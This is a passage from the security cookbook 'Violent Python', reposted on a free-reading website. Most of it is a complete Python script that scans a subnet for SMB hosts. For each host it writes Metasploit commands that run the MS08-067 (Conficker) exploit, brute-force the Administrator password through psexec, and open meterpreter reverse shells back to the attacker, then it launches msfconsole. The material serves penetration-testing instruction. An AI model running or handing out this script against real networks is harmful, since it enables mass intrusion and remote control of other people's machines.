Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers

Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers by TJ O'Connor

Book: Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers by TJ O'Connor Read Free Book Online
Authors: TJ O'Connor
Ads: Link
to scan for possible targets and exploit them using the MS08_067 vulnerability and/or brute force through a list of passwords to remotely execute processes. Finally, we will add some option parsing back to the main() function of the script and then call the previous written functions as required to wrap up the entire script. The complete script follows.
     import os
     import optparse
     import sys
     import nmap
     def findTgts(subNet):
      nmScan = nmap.PortScanner()
      nmScan.scan(subNet, ‘445’)
      tgtHosts = []
      for host in nmScan.all_hosts():
       if nmScan[host].has_tcp(445):
        state = nmScan[host][‘tcp’][445][‘state’]
        if state == ‘open’:
         print ‘[+] Found Target Host: ’ + host
         tgtHosts.append(host)
      return tgtHosts
     def setupHandler(configFile, lhost, lport):
      configFile.write(‘use exploit/multi/handler\n’)
      configFile.write(‘set payload ’+\
        ‘windows/meterpreter/reverse_tcp\n’)
      configFile.write(‘set LPORT ’ + str(lport) + ‘\n’)
      configFile.write(‘set LHOST ’ + lhost + ‘\n’)
      configFile.write(‘exploit -j -z\n’)
      configFile.write(‘setg DisablePayloadHandler 1\n’)
     def confickerExploit(configFile, tgtHost, lhost, lport):
      configFile.write(‘use exploit/windows/smb/ms08_067_netapi\n’)
      configFile.write(‘set RHOST ’ + str(tgtHost) + ‘\n’)
      configFile.write(‘set payload ’+\
        ‘windows/meterpreter/reverse_tcp\n’)
      configFile.write(‘set LPORT ’ + str(lport) + ‘\n’)
      configFile.write(‘set LHOST ’ + lhost + ‘\n’)
      configFile.write(‘exploit -j -z\n’)
     def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):
      username = ‘Administrator’
      pF = open(passwdFile, ‘r’)
      for password in pF.readlines():
       password = password.strip(‘\n’).strip(‘\r’)
       configFile.write(‘use exploit/windows/smb/psexec\n’)
       configFile.write(‘set SMBUser ’ + str(username) + ‘\n’)
       configFile.write(‘set SMBPass ’ + str(password) + ‘\n’)
       configFile.write(‘set RHOST ’ + str(tgtHost) + ‘\n’)
       configFile.write(‘set payload ’+\
        ‘windows/meterpreter/reverse_tcp\n’)
       configFile.write(‘set LPORT ’ + str(lport) + ‘\n’)
       configFile.write(‘set LHOST ’ + lhost + ‘\n’)
       configFile.write(‘exploit -j -z\n’)
     def main():
      configFile = open(‘meta.rc’, ‘w’)
      parser = optparse.OptionParser(‘[-] Usage%prog ’+\
       ‘-H -l [-p -F ]’)
      parser.add_option(‘-H’, dest=‘tgtHost’, type=‘string’, \
       help=‘specify the target address[es]’)
      parser.add_option(‘-p’, dest=‘lport’, type=‘string’, \
       help=‘specify the listen port’)
      parser.add_option(‘-l’, dest=‘lhost’, type=‘string’, \
       help=‘specify the listen address’)
      parser.add_option(‘-F’, dest=‘passwdFile’, type=‘string’, \
       help=‘password file for SMB brute force attempt’)
      (options, args) = parser.parse_args()
      if (options.tgtHost == None) | (options.lhost == None):
       print parser.usage
       exit(0)
      lhost = options.lhost
      lport = options.lport
      if lport == None:
       lport = ‘1337’
      passwdFile = options.passwdFile
      tgtHosts = findTgts(options.tgtHost)
      setupHandler(configFile, lhost, lport)
      for tgtHost in tgtHosts:
       confickerExploit(configFile, tgtHost, lhost, lport)
       if passwdFile != None:
        smbBrute(configFile, tgtHost, passwdFile, lhost, lport)
      configFile.close()
      os.system(‘msfconsole -r meta.rc’)
     if __name__ == ‘__main__’:
      main()
    So far we have exploited machines using some well-known methods. However, what happens when you encounter a target with no known exploit? How do you build your own zero-day attack?

Similar Books

Comfortably Numb: The Inside Story of Pink Floyd
Comfortably Numb: The Inside Story of Pink Floyd

Mark Blake

Sometimes the Magic Works
Sometimes the Magic Works

Terry Brooks

For My Brother
For My Brother

John C. Dalglish

Just In Time: An Alaskan Nights Novel
Just In Time: An Alaskan Nights Novel

Addison Fox

Damaged: An Erotic Romance Story
Damaged: An Erotic Romance Story

Laurie Mackenzie

The Penance of Black Betty
The Penance of Black Betty

Kelli Maine

Robinson Crusoe 2244
Robinson Crusoe 2244

E.J. Robinson

Celtic Fire
Celtic Fire

Joy Nash

Body Count
Body Count

James Rouch

The Magnificent Lizzie Brown and the Mysterious Phantom
The Magnificent Lizzie Brown and the Mysterious Phantom

Vicki Lockwood